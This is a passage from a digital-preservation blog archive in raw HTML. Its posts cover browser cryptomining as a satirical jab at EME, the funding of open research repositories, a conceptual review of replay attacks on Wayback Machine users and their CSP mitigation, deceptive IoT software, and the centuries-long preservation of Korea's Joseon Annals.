href="https://www.wsj.com/"><i>Wall Street Journal</i></a> and the <a href="https://www.nytimes.com/"><i>New York Times</i></a> have viable subscription business models based on (mostly) paywalled content. Even excellent journalism such as <a href="https://www.theguardian.com/"><i>The Guardian</i></a> is reduced to free access, advertising and voluntary donations. ...</li><li>Advertising-supported content. The market for Web advertising is so competitive and fraud-ridden that Web sites have been forced into letting advertisers run <a href="http://blog.dshr.org/2016/08/ok-im-really-amazed.html">ads that are so obnoxious </a>and indeed riddled with malware, and to load up their <a href="http://blog.dshr.org/2016/11/open-access-and-surveillance.html">sites with trackers</a>, that many users have rebelled and use ad-blockers. ...</li></ul></blockquote>The innovative third business model that sites are starting to use is to mine cryptocurrency in the reader's browser, using technology from <a href="https://coin-hive.com/">Coinhive</a>. TorrentFreak estimated that <a href="https://torrentfreak.com/how-much-money-can-pirate-bay-make-from-a-cryptocoin-miner-170924/">The Pirate Bay could make $12K/month</a> in this way.<br /><br />The problem with this approach is twofold. First, it <a href="https://betanews.com/2017/09/16/pirate-bay-secret-bitcoin-miner/">annoys the readers by consuming CPU</a>: <br /><blockquote class="tr_bq">Needless to say, the reaction has not been good -- even from the Pirate Bay's own moderators. Over on <a href="https://www.reddit.com/r/thepiratebay/comments/70aip7/100_cpu_on_all_8_threads_while_visiting_tpb/?sort=new">Reddit</a>, there are complaints about "100% CPU on all 8 threads while visiting TPB," and there are also threads on the <a href="https://pirates-forum.org/Thread-PIRATE-BAY-OFFICIAL-SITE-MINER">PirateBay Forum</a>.</blockquote>BleepingComputer tested a <a href="https://www.bleepingcomputer.com/news/security/chrome-extension-embeds-in-browser-monero-miner-that-drains-your-cpu/">Chrome extension that used Coinhive</a> and reported:<br /><blockquote>The impact on our test computer was felt immediately. Task Manager itself froze and entered a Not Responding state seconds after installing the extension. The computer became sluggish, and the SafeBrowse Chrome extension continued to mine Monero at all times when the Chrome browser was up and running.<br /><br />It is no wonder that users reacted with vitriol on the extension's review section. A Reddit user is currently trying to convince other users to report SafeBrowse as malware to the Chrome Web Store admins </blockquote>Second, it is easy for annoyed readers to see the cause of their problems:<br /><blockquote class="tr_bq">The code in question is tucked away in the site’s footer and uses a miner provided by <a href="https://coin-hive.com/">Coinhive</a>. This service offers site owners the option to convert the CPU power of users into Monero coins.<br /><img alt="" class="alignnone size-full wp-image-144755" height="80" src="https://torrentfreak.com/images/foot.png" width="400" /><br />The miner does indeed appear to increase CPU usage quite a bit. It is throttled at different rates (we’ve seen both 0.6 and 0.8) but the increase in resources is immediately noticeable. </blockquote>Then it is easy for them to <a href="https://betanews.com/2017/09/16/pirate-bay-secret-bitcoin-miner/">disable the cryptocurrency miner</a>:<br /><blockquote class="tr_bq">noscript will block it from running, as will disabling javascript.</blockquote>Ad-blockers have <a href="https://www.bleepingcomputer.com/news/security/showtime-websites-used-to-mine-monero-unclear-if-hack-or-an-experiment/">rapidly adapted to this new incursion</a>:<br /><blockquote>At least two ad blockers have added support for blocking Coinhive's JS library — <a href="https://adblockplus.org/blog/kicking-out-cryptojack" rel="nofollow" target="_blank">AdBlock Plus</a> and <a href="https://blog.adguard.com/en/adguard_vs_mining/" rel="nofollow" target="_blank">AdGuard</a> — and developers have also put together Chrome extensions that terminate anything that looks like Coinhive's mining script — <a href="https://chrome.google.com/webstore/detail/antiminer-block-coin-mine/abgnbkcdbiafipllamhhmikhgjolhdaf" rel="nofollow" target="_blank">AntiMiner</a>, <a href="https://chrome.google.com/webstore/detail/no-coin/gojamcfopckidlocpkbelmpjcgmbgjcl?hl=en" rel="nofollow" target="_blank">No Coin</a>, and <a href="https://chrome.google.com/webstore/detail/minerblock/emikbbbebcdfohonlaifafnoanocnebl" rel="nofollow" target="_blank">minerBlock</a>. </blockquote>So, is this new business model doomed to failure? No! This is where EME comes in. The <a href="https://www.eff.org/deeplinks/2013/10/lowering-your-standards">whole goal of EME</a> is to ensure that the reader and their browser neither know what encrypted content is doing, nor can do anything about it. All that is needed for robust profitability is for the site to use EME to encrypt the payload with the cryptocurrency miner. The reader and their browser may see their CPU cycles vanishing, but they can't know why nor be able to stop it. Is this brilliant, or what?David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com19tag:blogger.com,1999:blog-4503292949532760618.post-71694650667581873772017-09-26T08:00:00.000-07:002017-09-26T08:00:32.817-07:00Sustaining Open ResourcesCambridge University Office of Scholarly Communication's <a href="https://unlockingresearch.blog.lib.cam.ac.uk/"><i>Unlocking Research</i></a> blog has an interesting trilogy of posts looking at the issue of how open access research resources can be sustained for the long term:<br /><ul><li>Dr. Lauren Cadwallader's <a href="https://unlockingresearch.blog.lib.cam.ac.uk/?p=1483"><i>Open Resources, who should pay</i></a></li><li>David Carr's&nbsp; <a href="https://unlockingresearch.blog.lib.cam.ac.uk/?p=1520"><i>Sustaining open research resources – a funder perspective</i></a></li><li>Dave Gerrard's <a href="https://unlockingresearch.blog.lib.cam.ac.uk/?p=1596"><i>Sustaining long-term access to open research resources – a university library perspective</i></a></li></ul>Below the fold I summarize each of their arguments and make some overall observations.<br /><a name='more'></a><h3><a href="https://unlockingresearch.blog.lib.cam.ac.uk/?p=1483">Lauren Cadwallader</a></h3>From the researcher's perspective, Dr. Cadwallader uses the example of the <a href="http://www.virtualflybrain.org/site/vfb_site/home.htm">Virtual Fly Brain</a>, a domain-specific repository for the connections of neurons in <i>Drosophila</i> brains. It was established by UK researchers 8 years ago and is now used by about 10 labs in the UK and about 200 worldwide. It was awarded a 3-year Research Council grant, which was not renewed. The Wellcome Trust awarded a further 3 year grant, ending this month. As of June:<br /><blockquote>it is uncertain whether or not they will fund it in the future. ... On the one hand funders like the Wellcome Trust, Research Councils UK and National Institutes of Health (NIH) are encouraging researchers to use domain specific repositories for data sharing. Yet on the other, they are acknowledging that the current approaches for these resources are not necessarily sustainable. </blockquote>Clearly, this is a global resource not a UK one, but there is no global institution funding research in <i>Drosophila</i> brains. There is a free rider problem; each individual national or charitable funder depends on the resource but would rather not pay for it, and there is no penalty for avoiding paying until it is too late and the resource has gone.<br /><h3><a href="https://unlockingresearch.blog.lib.cam.ac.uk/?p=1520">David Carr</a></h3>From the perspective of the <a href="http://www.wellcome.ac.uk/openresearch">Open Research team</a> at the Wellcome Trust Carr notes that:<br /><blockquote class="tr_bq">Rather than ask for a data management plan, applicants are now asked to provide an outputs management plan setting out how they will maximise the value of their research outputs more broadly.<br /><br />Wellcome commits to meet the costs of these plans as an integral part of the grant, and provides <a href="https://wellcome.ac.uk/funding/managing-grant/developing-outputs-management-plan">guidance</a> on the costs that funding applicants should consider. We recognise, however, that many research outputs will continue to have value long after the funding period comes to an end. We must accept that preserving and making these outputs available into the future carries an ongoing cost.</blockquote>Wellcome has been addressing these on-going costs by providing:<br /><blockquote>significant grant funding to repositories, databases and other community resources. As of July 2016, Wellcome had active grants totalling £80 million to support major data resources. We have also invested many millions more in major cohort and longitudinal studies, such as UK Biobank and ALSPAC. We provide such support through our <a href="https://wellcome.ac.uk/funding/biomedical-resource-and-technology-development-grants">Biomedical Resource and Technology Development</a> scheme, and have provided additional major awards over the years to support key resources, such as <a href="https://www.ebi.ac.uk/pdbe/">PDB-Europe</a>, <a href="http://www.ensembl.org/index.html">Ensembl</a> and the <a href="https://www.openmicroscopy.org/">Open Microscopy Environment</a>. </blockquote>However, these are still grants with end-dates such as faced the Virtual Fly Brain:<br /><blockquote>While our funding for these resources is not open-ended and subject to review, we have been conscious for some time that the reliance of key community resources on grant funding (typically of three to five years’ duration) can create significant challenges, hindering their ability to plan for the long-term and retain staff. </blockquote>Clearly funders have difficulty committing funds for the long term. And if their short-term funding is successful, they are faced with a "too big to fail" problem. The repository says "pay up now or the entire field of research gets it". Not where a funder wants to end up. Nor is the necessary brinkmanship conducive to "their ability to plan for the long-term and retain staff".<br /><br />An international workshop of data resources and major funders in the life sciences:<br /><blockquote class="tr_bq">resulted in a <a href="http://www.biorxiv.org/content/early/2017/04/27/110825">call for action</a> (<a href="http://www.nature.com/nature/journal/v543/n7644/full/543179a.html">reported in <i>Nature</i></a>) to coordinate efforts to ensure long-term sustainability of key resources, whilst supporting resources in providing access at no charge to users.&nbsp; The group proposed an international mechanism to prioritise core data resources of global importance, building on the work undertaken by ELIXIR to <a href="https://f1000research.com/articles/5-2422/v2">define criteria for such resources</a>.&nbsp; It was proposed national funders could potentially then contribute a set proportion of their overall funding (with initial proposals suggesting around 1.5 to 2 per cent) to support these core data resources.</blockquote>A voluntary "tax" of this kind may be the least bad approach to funding global resources.<br /><h3><a href="https://unlockingresearch.blog.lib.cam.ac.uk/?p=1596">Dave Gerrard</a></h3>From the perspective of a Technical Specialist Fellow from the Polonsky-Foundation-funded <a href="https://www.dpoc.ac.uk/">Digital Preservation at Oxford and Cambridge</a> project, Gerrard argues that there are two different audiences for open resources. I agree with him about the <a href="https://documents.clockss.org/index.php?title=CLOCKSS:_Designated_Community">impracticality of the OAIS concept</a> of Designated Community: <br /><blockquote class="tr_bq"><span style="font-weight: 400;">The concept of Designated Communities is one that, in my opinion, the OAIS Reference Model never adequately gets to grips with. For instance, the OAIS Model suggests including explanatory information in specialist repositories to make the content understandable to the general community.</span><br /><br /><span style="font-weight: 400;">Long term access within this definition thus implies designing repositories for Designated Communities consisting of what my co-Polonsky-Fellow Lee Pretlove describes as: “all of humanity, plus robots”. The deluge of additional information that would need to be added to support this totally general resource would render it unusable; to aim at everybody is effectively aiming at nobody. And, crucially, “nobody” is precisely who is most likely to fund a “specialist repository for everyone”, too.</span></blockquote>Gerrard argues that the two audiences need:<br /><blockquote class="tr_bq"><span style="font-weight: 400;">two quite different types of repository. There’s the ‘ultra-specialised’ Open Research repository for the Designated Community of researchers in the related domain, and then there’s the more general institutional ‘special collection’ repository containing materials that provide context to the science, ..</span><span style="font-weight: 400;">. Sitting somewhere between the two are publications – the specialist repository might host early drafts and work in progress, while the institutional repository contains finished, publish work. And the institutional repository might also collect enough data to support these publications</span></blockquote>Gerrard is correct to point out that:<br /><blockquote class="tr_bq"><span style="font-weight: 400;">a scientist needs access to her ‘personal papers’ while she’s still working, so, in the old days (i.e. more than 25 years ago) the archive couldn’t take these while she was still active, and would often have to wait for the professor to retire, or even die, before such items could be donated. However, now everything is digital, the prof can both keep her “papers” locally </span><i><span style="font-weight: 400;">and deposit them at the same time</span></i><span style="font-weight: 400;">. The library special collection </span><i><span style="font-weight: 400;">doesn’t need to wait for the professor to die</span></i><span style="font-weight: 400;"> to get their hands on the context of her work. Or indeed, wait for her to become a professor.</span></blockquote>This works in an ideal world because:<br /><blockquote class="tr_bq"><span style="font-weight: 400;">A further outcome of being able to donate digitally is that <b>scientists become more responsible for managing their personal digital materials well</b>, so that it’s easier to donate them as they go along.</span></blockquote><span style="font-weight: 400;">But in the real world this effort to "</span><span style="font-weight: 400;"><span style="font-weight: 400;">keep their ongoing work neat and tidy" is frequently viewed as a distraction from the urgent task of publishing not perishing. The researcher bears the cost of depositing her materials, the benefits accrue to other researchers in the future. Not a powerful motivation.</span></span><br /><span style="font-weight: 400;"><span style="font-weight: 400;"><br /></span></span><span style="font-weight: 400;"><span style="font-weight: 400;">Gerrard argues that his model clarifies the funding issues:</span></span><br /><blockquote class="tr_bq"><span style="font-weight: 400;"><span style="font-weight: 400;"><span style="font-weight: 400;">Funding specialist Open Research repositories should be the responsibility of funders in that domain, but they shouldn’t have to worry about long-term access to those resources. As long as the science is active enough that it’s getting funded, then a proportion of that funding should go to the repositories that science needs to support it.</span></span></span></blockquote><span style="font-weight: 400;"><span style="font-weight: 400;">Whereas:</span></span><br /><blockquote class="tr_bq"><span style="font-weight: 400;">university / institutional repositories need to find quite separate funding for their archivists to start building relationships with those same scientists, and working with them to both collect the context surrounding their science as they go along, and prepare for the time when the specialist repository needs to be mothballed. With such contextual materials in place, there don’t seem to be too many insurmountable technical reasons why, when it’s acknowledged that the “switch from one Designated Community to another” has reached the requisite tipping point, the university / institutional repository couldn’t archive the whole of the specialist research repository, describe it sensibly using the contextual material they have collected from the relevant scientists as they’ve gone along, and then store it cheaply</span></blockquote><span style="font-weight: 400;"><span style="font-weight: 400;">This sounds plausible but both halves ignore problems:</span></span><br /><ul><li><span style="font-weight: 400;"><span style="font-weight: 400;">The value of the resource will outlast many grants, where the funders are constrained to award short-term grants. A voluntary "tax" on these grants would diversify the repository's income, but voluntary "taxes" are subject to the free-rider problem. To assure staff recruiting and minimize churn, the repository needs reserves, so the tax needs to exceed the running cost, reinforcing the free-rider's incentives.</span></span></li><li>These open research repositories are a global resource. Once the "tipping point" happens, which of the many university or institutional repositories gets to bear the cost of ingesting and preserving the global resource? All the others get to free-ride. Or does Gerrard envisage disaggregating the domain repository so that each researcher's contributions end up in their institution's repository? If so, how are contributions handled from (a) collaborations between labs, and (b) a researcher's career that spans multiple institutions? Or does he envisage the researcher depositing everything into <i>both</i> the domain <i>and</i> the institutional repository? The researcher's motivation is to deposit into the domain repository. The additional work to deposit into the institutional repository is just make-work to benefit the institution, to which these days most researchers have little loyalty. The whole value of domain repositories is the way they aggregate the outputs of all researchers in a field. Isn't it important to preserve that value for the long term?</li></ul>David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com1tag:blogger.com,1999:blog-4503292949532760618.post-90551706619699136472017-09-19T08:00:00.001-07:002017-09-19T08:00:10.591-07:00Attacking (Users Of) The Wayback MachineRight from the start, <a href="http://blog.dshr.org/2013/10/it-was-fifteen-years-ago-today.html">nearly two decades ago</a>, the <a href="http://lockss.org/locksswiki/files/Freenix2000.pdf">LOCKSS system assumed that</a>: <br /><blockquote>Alas, even libraries have enemies. Governments and corporations have tried to rewrite history. Ideological zealots have tried to suppress research of which they disapprove. </blockquote>The <a href="http://dx.doi.org/10.1145/945445.945451">LOCKSS polling and repair protocol</a> was designed to make it as difficult as possible for even a powerful attacker to change content preserved in a decentralized LOCKSS network, by exploiting excess replication and the lack of a central locus of control.<br /><br />Just like libraries, Web archives have enemies. <a href="http://blog.dshr.org/2017/06/wac2017-security-issues-for-web-archives.html">Jack Cushman and Ilya Kreymer's (CK) talk at the 2017 Web Archiving Conference</a> identified <a href="http://blog.dshr.org/2017/06/wac2017-security-issues-for-web-archives.html">seven potential vulnerabilities</a> of centralized Web archives that an attacker could exploit to change or destroy content in the archive, or mislead an eventual reader as to the archived content.<br /><br />Now, <a href="http://repository.wellesley.edu/scholarship/158/"><i>Rewriting History: Changing the Archived Web from the Present</i></a> by Ada Lerner <i>et al</i> (L) identifies four attacks that, without compromising the archive itself, caused browsers using the Internet Archive's Wayback Machine to view pages that look different to the originally archived content. It is important to observe that the title is misleading, and that these attacks are less serious than those that compromise the archive. Problems with replaying archived content are fixable, loss or damage to archived content is not fixable.<br /><br />Below the fold I examine L's four attacks and relate them to CK's seven vulnerabilities.<br /><a name='more'></a><br />To review, CK's seven vulnerabilities are:<br /><ol><li>Archiving local server files, in which resources <i>local to the crawler</i> end up in the archive.</li><li>Hacking the headless browser, in which vulnerabilities in the execution of Javascript by the crawler are exploited.</li><li>Stealing user secrets during capture, a vulnerability of user-driven crawlers which typically violate cross-domain protections.</li><li>Cross site scripting to <a href="http://blog.dshr.org/2017/06/wac2017-security-issues-for-web-archives.html">steal archive logins</a>:<br /><blockquote>When replaying preserved content, the archive must serve all preserved content from a different top-level domain from that used by users to log in to the archive and for the archive to serve the parts of a replay page (e.g. the Wayback machine's timeline) that are not preserved content. The preserved content should be isolated in an iframe. </blockquote></li><li>Live web leakage on <a href="http://blog.dshr.org/2017/06/wac2017-security-issues-for-web-archives.html">playback</a>:<br /><blockquote>Especially with Javascript in archived pages, it is hard to make sure that all resources in a replayed page come from the archive, not from the live Web. If live Web Javascript is executed, all sorts of bad things can happen. Malicious Javascript could exfiltrate information from the archive, track users, or modify the content displayed. </blockquote></li><li>Show different page contents when archived:<br /><blockquote>it is possible for an attacker to create pages that detect when they are being archived, so that the archive's content will be unrepresentative and possibly hostile. Alternately, the page can detect that it is being replayed, and display different content or attack the replayer. </blockquote></li><li>Banner spoofing:<br /><blockquote>When replayed, malicious pages can overwrite the archive's banner, misleading the reader about the provenance of the page. </blockquote></li></ol>Vulnerabilities CK1 through CK4 are attacks on the archive itself, possibly leading to corruption and loss. The remaining three are attacks on the eventual reader, similar to of L's four. You need to read the paper to get the full details of their attacks, but in summary they are are:<br /><ol><li>Archive-Escape Abuse: The attackers identified an archived victim page that embedded a JavaScript resource from a third-party domain that had no owner, which they show is common. The resource was not present in the archive, so when they obtained control of the domain they were able to serve from it malicious JavaScript that the page served from the Wayback Machine would include. This is a version of vulnerability CK5.</li><li>Same-Origin Escape Abuse: The attackers identified an archived victim page that, in an iframe from a third-party domain, included malicious JavaScript. On the live Web the Same-Origin policy prevented it from executing, but when served from the Wayback Machine the page and the iframe had the same origin. This is related to vulnerability CK4. It requires foresight, since the iframe code must be present at ingest time.</li><li>Same-Origin Escape + Archive-Escape: The attackers combined L1 and L2 by including in the iframe code that deliberately generated archive escapes. It again requires foresight, since the escape-generating code must be present at ingest time.</li><li>Anachronism-Injection: The attackers identified an archived victim page that embedded a JavaScript resource from a third-party domain that had no owner. The resource was not present in the archive, so when they obtained control of the domain they could use the Wayback Machine's "Save Page Now" facility to create an archived version of the resource. Now when the Wayback Machine served the page, the attackers' version of the resource would be served from the archive. The only way to defend against this attack, since the attacker's version of the resource will always be the closest in time to the victim page, would be to restrict searches for nearest-in-time resources to a small time range.</li></ol>Unlike L, CK note that Web archives could <a href="http://blog.dshr.org/2017/06/wac2017-security-issues-for-web-archives.html">prevent leaks to the live Web</a>:<br /><blockquote class="tr_bq">Injecting the <a href="https://content-security-policy.com/">Content-Security-Policy</a> (CSP) header into replayed content could mitigate these risks by preventing compliant browsers from loading resources except from the specified domain(s), which would be the archive's replay domain(s).</blockquote>Web archives should; browsers have <a href="https://content-security-policy.com/">supported the CSP header</a> for at least 4 years. The version of the Wayback Machine used by the Internet Archive's ArchiveIt service uses CSP to prevent live Web leakage, but the main Wayback Machine currently doesn't. If it did, L1 through L3 would be ineffective.<br /><br />All this being said, there are some important caveats that users of preserved Web content should bear in mind. It is extremely likely that the payload of a URL delivered by the Wayback Machine is the same as that its crawler collected at the specified time. However, this does <i>not</i> mean that the rendered page in your browser looks the same as it would have had you visited the page when the Wayback Machine's crawler did:<br /><ul><li>If the Web archive's replay system does not use CSP, all bets are off.</li><li>Browsers evolve, rendering pages differently. Using <a href="http://oldweb.today/">oldweb.today</a> can mitigate, but not eliminate this problem, as I wrote in <a href="http://blog.dshr.org/2016/01/the-internet-is-for-cats.html"><i>The Internet Is for Cats</i></a>.</li><li>The embedded resources, such as images, CSS files, and JavaScript libraries, may not have been collected at the same time as the page itself, so may be different, as in the L4 attack.</li><li>At collection time, the owner of the page's domain, or the domain of any of the embedded resources, or even someone who had compromised the Web servers of the page or any of its embedded resources, could be malicious. As in the CK6 vulnerability, they could detect that the page was being archived and deliver to the crawler a <a href="https://en.wikipedia.org/wiki/Rickrolling">payload different from</a> that they would have delivered to a browser.</li></ul>The bottom line is that all critical uses of preserved Web content, such as legal evidence, should be based on the <i>source of the payload</i>, not on a rendered page image.David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com2tag:blogger.com,1999:blog-4503292949532760618.post-65579742688728894642017-09-12T08:00:00.000-07:002017-09-12T08:00:02.540-07:00The Internet of Things is Haunted by DemonsThis is just a quick note to get you to read Cory Doctorow's <a href="http://www.locusmag.com/Perspectives/2017/09/cory-doctorow-demon-haunted-world/"><i>Demon-Haunted World</i></a>. We all know that the Internet of Things is <a href="http://blog.dshr.org/2016/12/bitag-on-iot.html">infested with bugs</a> that <a href="http://blog.dshr.org/2014/10/familiarity-breeds-contempt.html">cannot be exterminated</a>. That's not what Doctorow is writing about. He is focused on the non-bug software in the Things that makes them do what their manufacturer wants, not what the customer who believes they own the Thing wants.<br /><a name='more'></a><br />In particular Doctorow looks at examples such as Dieselgate in which the manufacturer wants to <a href="http://www.locusmag.com/Perspectives/2017/09/cory-doctorow-demon-haunted-world/">lie to the world about what the Thing does</a>:<br /><blockquote class="tr_bq">All these forms of cheating treat the owner of the device as an enemy of the company that made or sold it, to be thwarted, tricked, or forced into con­ducting their affairs in the best interest of the com­pany’s shareholders. To do this, they run programs and processes that attempt to hide themselves and their nature from their owners, and proxies for their owners (like reviewers and researchers).<br /><br />Increasingly, cheating devices behave differ­ently depending on who is looking at them. When they believe themselves to be under close scrutiny, their behavior reverts to a more respectable, less egregious standard.</blockquote>Doctorow's piece provides many examples, but a week later he provides another, seemingly benign example. Tesla provided some of their cars <a href="https://techcrunch.com/2017/09/09/tesla-flips-a-switch-to-increase-the-range-of-some-cars-in-florida-to-help-people-evacuate/">with an over-the-air temporary range upgrade</a> to help their owners escape hurricane Irma. They could do this <a href="https://boingboing.net/2017/09/10/iron-man-is-a-dick.html">because</a>:<br /><blockquote class="tr_bq">Tesla sells both 60kWh and 75kWh versions of its Model S and Model X cars; but these cars have identical batteries -- the 60kWh version runs software that simply misreports the capacity of the battery to the charging apparatus and the car's owner. </blockquote>And it would be a <a href="https://boingboing.net/2017/09/10/iron-man-is-a-dick.html">crime to upgrade yourself</a> to use the battery you bought:<br /><blockquote class="tr_bq">[Tesla] has to rely on the Computer Fraud and Abuse Act (1986), which felonizes violating terms of service. It has to rely on Section 1201 of the DMCA, which provides prison sentences of 5 years for first offenders who bypass locks on the devices they own. </blockquote>It is easy to see that the capability Tesla used could be used for other things:<br /><blockquote class="tr_bq">The implications of this are grim. A repo depot could brick your car over the air (and it would be a felony to write code to unbrick it). Worse, <a href="http://this.deakin.edu.au/lifestyle/car-wars">hackers who can successfully impersonate Tesla, Inc. to your car will have the run of the device</a>: it is designed to allow remote parties to override the person behind the wheel, and contains active countermeasures to prevent you from reasserting control.</blockquote>Doctorow <a href="http://www.locusmag.com/Perspectives/2017/09/cory-doctorow-demon-haunted-world/">concludes</a>:<br /><blockquote class="tr_bq">The software in gadgets makes it very tempting indeed to fill them with pernicious demons, but these laws criminalize trying to exorcise those demons.<br /><br />There’s some movement on this. A suit brought by the ACLU attempts to carve some legal exemp­tions for researchers out of the Computer Fraud and Abuse Act. Another suit brought by the Electronic Frontier Foundation seeks to invalidate Section 1201 of the Digital Millennium Copyright Act.<br /><br />Getting rid of these laws is the first step towards restoring the order in which things you own treat you as their master, but it’s just the start. There must be anti-trust enforcement with the death penalty – corporate dissolution – for companies that are caught cheating. When the risk of getting caught is low, then increasing penalties are the best hedge against bad action. The alternative is toasters that won’t accept third-party bread and dishwashers that won’t wash unauthorized dishes.</blockquote>Just go read <a href="http://www.locusmag.com/Perspectives/2017/09/cory-doctorow-demon-haunted-world/">both of</a> <a href="https://boingboing.net/2017/09/10/iron-man-is-a-dick.html">his pieces</a>.<br /><br />David.http://www.blogger.com/profile/14498131502038331594noreply@blogger.com3tag:blogger.com,1999:blog-4503292949532760618.post-40316794056390943952017-09-05T08:00:00.000-07:002017-09-13T18:50:12.374-07:00Long-Lived Scientific Observations<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-xUjrn70bzew/WaixguNxcGI/AAAAAAAAD3c/rMwAtSbporwJSf07Bp9N12TDDctEr5nqgCLcBGAs/s1600/Shang_dynasty_inscribed_scapula.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1232" data-original-width="800" height="200" src="https://1.bp.blogspot.com/-xUjrn70bzew/WaixguNxcGI/AAAAAAAAD3c/rMwAtSbporwJSf07Bp9N12TDDctEr5nqgCLcBGAs/s200/Shang_dynasty_inscribed_scapula.jpg" width="129" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">By <a href="https://commons.wikimedia.org/wiki/User:BabelStone" title="User:BabelStone">BabelStone</a>, <a href="http://creativecommons.org/licenses/by-sa/3.0" title="Creative Commons Attribution-Share Alike 3.0">CC BY-SA 3.0</a><br /><a href="https://commons.wikimedia.org/w/index.php?curid=16189953">Source</a></td></tr></tbody></table>Keeping scientific data, especially observations that are not repeatable, for the long term is important. In our <a href="http://dx.doi.org/10.1145/1217935.1217957">2006 Eurosys paper</a> we used an example from China. During the Shang dynasty:<br /><blockquote>astronomers inscribed eclipse observations on animal bones. About 3200 years later, researchers used these records to estimate that the accumulated clock error was about 7 hours. From this they derived a value for the <a href="http://dx.doi.org/10.1007/BF00879584">viscosity of the Earth's mantle</a> as it rebounds from the weight of the glaciers.</blockquote>Last week we had another, if only one-fifth as old, example of the value of long-ago scientific observations. <a href="https://phys.org/news/2017-08-scientists-recover-nova-years-korean.html">Korean astronomers' records of a nova in 1437</a> provide strong evidence that:<br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-5DY-Nr442ys/Wagnig6A8rI/AAAAAAAAD3A/gbQtcylxViAhS0sGnbe6M7bSPojIhimYgCLcBGAs/s1600/KoreanNova1473-Lo.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="480" data-original-width="533" height="180" src="https://4.bp.blogspot.com/-5DY-Nr442ys/Wagnig6A8rI/AAAAAAAAD3A/gbQtcylxViAhS0sGnbe6M7bSPojIhimYgCLcBGAs/s200/KoreanNova1473-Lo.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://dx.doi.org/10.1038/nature23644">1473 nova remains</a></td></tr></tbody></table><blockquote>"cataclysmic binaries"—novae, novae-like variables, and dwarf novae—are one and the same, not separate entities as has been previously suggested. After an eruption, a nova becomes "nova-like," then a dwarf nova, and then, after a possible hibernation, comes back to being nova-like, and then a nova, and does it over and over again, up to 100,000 times over billions of years.</blockquote>How were these 580-year-old records preserved? Follow me below the fold.<br /><a name='more'></a><br />The <strike>eclipse</strike> nova was recorded in the <i>sillok</i>, the <a href="https://en.wikipedia.org/wiki/Veritable_Records_of_the_Joseon_Dynasty#Compilation"><i>Annals of the Joseon Dynasty</i></a>. Because they were compiled over 200 years after Choe Yun-ui's (최윤의) <a href="https://en.wikipedia.org/wiki/Choe_Yun-ui">1234 invention of bronze movable type</a>, the final versions of each reign's Annals, from:<br /><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-0umLIVnmDhk/WamP0WgO5_I/AAAAAAAAD3s/ENnimgVHZdkO_AkIVbJef8NO-sxBOCdnACLcBGAs/s1600/SejongSillok.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="461" data-original-width="591" height="155" src="https://3.bp.blogspot.com/-0umLIVnmDhk/WamP0WgO5_I/AAAAAAAAD3s/ENnimgVHZdkO_AkIVbJef8NO-sxBOCdnACLcBGAs/s200/SejongSillok.jpg" width="200" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="http://www.unesco.org/webworld/nominations/images/korea/6b.jpg">Source</a></td></tr></tbody></table><blockquote>the Annals of <a class="mw-redirect" href="https://en.wikipedia.org/wiki/Sejong_the_Great_of_Joseon" title="Sejong the Great of Joseon">Sejong</a> (r. 1418–1450) onwards, were printed with movable metal and wooden type, which was unprecedented in the making of annals in Japan and China.</blockquote>And Lots Of Copies were made to Keep Stuff Safe using <a href="https://en.wikipedia.org/wiki/Veritable_Records_of_the_Joseon_Dynasty#Compilation">geographical diversity</a>, regular audit, and replacement of lost copies:<br /><blockquote>Four separate repositories were established in <a href="https://en.wikipedia.org/wiki/Blue_House" title="Blue House">Chunchugwan</a>, <a href="https://en.wikipedia.org/wiki/Chungju" title="Chungju">Chungju</a> County, <a href="https://en.wikipedia.org/wiki/Jeonju" title="Jeonju">Jeonju</a> County, and <a href="https://en.wikipedia.org/wiki/Seongju_County" title="Seongju County">Seongju County</a> to store copies of the <i>Annals</i>. All but the repository in Jeonju were burned down during the <a class="mw-redirect" href="https://en.wikipedia.org/wiki/Japanese_invasions_of_Korea_%281592%E2%80%931598%29" title="Japanese invasions of Korea (1592–1598)">Imjin wars</a>. After the war, five more copies of the <i>Annals</i> were produced and stored in Chunchugwan and the mountain repositories of <a class="mw-redirect" href="https://en.wikipedia.org/wiki/Myohyang-san" title="Myohyang-san">Myohyang-san</a>, <a href="https://en.wikipedia.org/wiki/Taebaeksan" title="Taebaeksan">Taebaeksan</a>, <a href="https://en.wikipedia.org/wiki/Odaesan" title="Odaesan">Odaesan</a>, and <a href="https://en.wikipedia.org/wiki/Manisan_%28Incheon%29" title="Manisan (Incheon)">Mani-san</a>. </blockquote>A good way to preserve information, which the LOCKSS Program implemented! The story of their preservation is told in Shin Byung Ju's <a href="http://koreana.kf.or.kr/pdf_file/2008/2008_AUTUMN_E016.pdf"><i>Dedicated Efforts to Preserve the Annals of the Joseon Dynasty</i></a>:<br /><blockquote>Although the <i>Annals of the Joseon Dynasty (Joseonwangjosillok)</i> have been duly recognized as an incomparable documentary treasure, this would not have been possible without its elaborate and scientific system of maintenance and preservation. This included the building of archives in remote mountainous regions, where the <i>Annals</i> could be safely stored for future generations, along with the development of nearby guardian temples to protect the archives during times of crisis. The <i>Annals</i> would be stored in special boxes, together with medicinal herbs to ward off insects and absorb moisture. Also, the Annals were aired out once every two years as part of a continuous maintenance and preservation process. As such, it was the rigid adherence to these painstaking procedures that enabled the <i>Annals of the Joseon Dynasty</i> to be maintained in their original form after all these centuries. </blockquote>The details are fascinating, <a href="http://koreana.kf.or.kr/pdf_file/2008/2008_AUTUMN_E016.pdf">go read!</a> Similar care was taken at <a 